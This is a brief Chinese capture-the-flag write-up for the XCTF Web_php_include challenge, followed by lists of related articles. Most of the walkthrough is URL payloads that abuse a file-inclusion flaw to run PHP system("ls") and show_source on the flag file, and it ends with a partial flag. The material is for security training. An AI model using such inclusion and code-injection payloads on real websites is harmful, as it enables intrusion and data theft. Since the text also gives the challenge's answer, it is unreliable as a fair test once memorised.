攻防世界web进阶区之Web_php_include

时间 2021-01-06

标签 web CTF 栏目 HTML 繁體版

原文原文链接

代码审计后我们会发现存在文件包含漏洞。借助hello参数构建payload:?page=http://127.0.0.1/index.php/?hello=<?system("ls")?>然后借助参数?page=http://127.0.0.1/index.php/?hello=<?show_source("fl4gisisish3r3.php");?>即可得到flag ctf{876a5fca

>>阅读原文<<

1. 攻防世界web进阶区Web_php_include
2. 攻防世界web进阶区之unserialize3
3. 攻防世界web进阶区之CAT
4. 攻防世界web进阶区之PHP2
5. 攻防世界web进阶区之Web_php_unserialize
6. 攻防世界web进阶区之shrine
7. 攻防世界web进阶区之easytornado
8. 攻防世界web进阶区之warmup
9. 攻防世界web进阶区之mfw
10. 攻防世界web进阶区之bug
更多相关文章...
• Scala 高阶函数 - Scala教程
• PHP 5 时区 - PHP参考手册
• 互联网组织的未来：剖析GitHub员工的任性之源
• 为了进字节跳动，我精选了29道Java经典算法题，带详细讲解

最新文章

1. Window下Ribbit MQ安装
2. Linux下Redis安装及集群搭建
3. shiny搭建网站填坑战略
4. Mysql8.0.22安装与配置详细教程
5. Hadoop安装及配置
6. Python爬虫初学笔记
7. 部署LVS-Keepalived高可用集群
8. keepalived+mysql高可用集群
9. jenkins 公钥配置
10. HA实用详解

本站公众号

欢迎关注本站公众号,获取更多信息

1. 攻防世界web进阶区Web_php_include
2. 攻防世界web进阶区之unserialize3
3. 攻防世界web进阶区之CAT
4. 攻防世界web进阶区之PHP2
5. 攻防世界web进阶区之Web_php_unserialize
6. 攻防世界web进阶区之shrine
7. 攻防世界web进阶区之easytornado
8. 攻防世界web进阶区之warmup
9. 攻防世界web进阶区之mfw
10. 攻防世界web进阶区之bug

>>更多相关文章<<